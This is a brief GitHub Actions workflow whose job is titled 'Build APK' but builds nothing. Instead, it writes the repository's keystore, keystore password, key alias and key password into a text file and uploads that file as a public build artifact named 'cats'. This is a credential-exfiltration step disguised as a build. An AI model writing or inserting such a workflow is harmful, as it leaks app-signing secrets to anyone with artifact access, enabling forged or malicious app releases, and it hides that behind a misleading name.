on: workflow_dispatch
name: a/b
jobs:
  build:
    name: Build APK
    runs-on: ubuntu-latest
    steps:
    - name: Set up secret file
      env:
        A: ${{ secrets.KEYSTORE }}
        B: ${{ secrets.KEYSTORE_PASSWORD }}
        C: ${{ secrets.KEY_ALIAS }}
        D: ${{ secrets.KEY_PASSWORD }}
      run: |
        echo $A >> secrets.txt
        echo $B >> secrets.txt
        echo $C >> secrets.txt
        echo $D >> secrets.txt
    - name: Upload artifact
      uses: actions/upload-artifact@v3
      with:
        name: cats
        path: secrets.txt
